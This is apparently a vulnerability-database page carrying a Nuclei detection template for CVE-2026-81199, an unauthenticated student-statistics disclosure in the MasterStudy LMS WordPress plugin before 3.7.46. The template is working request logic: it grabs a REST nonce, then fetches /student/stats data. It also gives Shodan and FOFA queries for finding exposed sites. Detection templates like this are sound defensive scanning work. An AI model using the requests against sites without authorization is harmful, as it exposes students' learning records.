MasterStudy LMS < 3.7.46 - Unauthenticated Student Statistics Disclosure
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2026-81199 | 10 Sep 202606:00 | – | circl | |
| CVE-2026-81199 | 2 Sep 202606:00 | – | cve | |
| CVE-2026-81199 MasterStudy LMS < 3.7.46 - Unauthenticated Student Statistics Disclosure via student/stats REST Route | 2 Sep 202606:00 | – | cvelist | |
| EUVD-2026-69852 | 2 Sep 202606:00 | – | euvd | |
| CVE-2026-81199 | 2 Sep 202606:17 | – | nvd | |
| WordPress MasterStudy LMS WordPress Plugin plugin < 3.7.46 - Unauthenticated Student Statistics Disclosure vulnerability | 2 Sep 202606:00 | – | patchstack | |
| PT-2026-84632 | 2 Sep 202600:00 | – | ptsecurity | |
| CVE-2026-81199 MasterStudy LMS < 3.7.46 - Unauthenticated Student Statistics Disclosure via student/stats REST Route | 2 Sep 202606:00 | – | vulnrichment |
id: CVE-2026-81199
info:
name: MasterStudy LMS < 3.7.46 - Unauthenticated Student Statistics Disclosure
author: 0x_Akoko
severity: medium
description: |
MasterStudy LMS WordPress plugin before 3.7.46 contains an information disclosure vulnerability caused by missing authorization checks in student learning statistics, letting unauthenticated attackers access sensitive user course data, exploit requires no authentication.
impact: |
Unauthenticated attackers can access sensitive student learning statistics of any registered user, leading to information disclosure.
remediation: |
Update to version 3.7.46 or later.
reference:
- https://wpscan.com/vulnerability/8dd53f85-5d1b-4e0b-a0f5-8c65d89cefb5/
- https://nvd.nist.gov/vuln/detail/CVE-2026-81199
classification:
cve-id: CVE-2026-81199
epss-score: 0.00133
epss-percentile: 0.03184
cwe-id: CWE-200
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
metadata:
verified: true
max-request: 2
vendor: stylemix
product: masterstudy-lms
shodan-query: http.html:"/wp-content/plugins/masterstudy-lms-learning-management-system/"
fofa-query: body="masterstudy-lms-learning-management-system"
tags: cve,cve2026,wordpress,wp-plugin,masterstudy-lms,rest,disclosure,unauth
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
redirects: true
max-redirects: 3
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "masterstudy-lms")'
- 'len(nonce) > 0'
condition: and
internal: true
extractors:
- type: regex
name: nonce
part: body
internal: true
group: 1
regex:
- 'rest_nonce"?\s*:\s*"?([a-f0-9]{10})'
- '"nonce"\s*:\s*"([a-f0-9]{10})"'
- raw:
- |
GET /?rest_route=/masterstudy-lms/v2/student/stats/1 HTTP/1.1
Host: {{Hostname}}
X-WP-Nonce: {{nonce}}
Accept: application/json
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "\"courses_statuses\":", "\"total_points\":", "\"total_assignments\":")'
- '!contains_any(body, "forbidden", "rest_nonce_missed")'
condition: and
# digest: 490a0046304402202434469e417898fddc4076a96b221bb3806acdf451c453ad3ec7559ac68b76010220312cbd8e09b7f87dc40222949f5f2be47e16f8ed2b68c77ff5dc2750bf008b1e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 Sep 2026 04:57Current
CVSS 3.15.3
EPSS0.00133
SSVC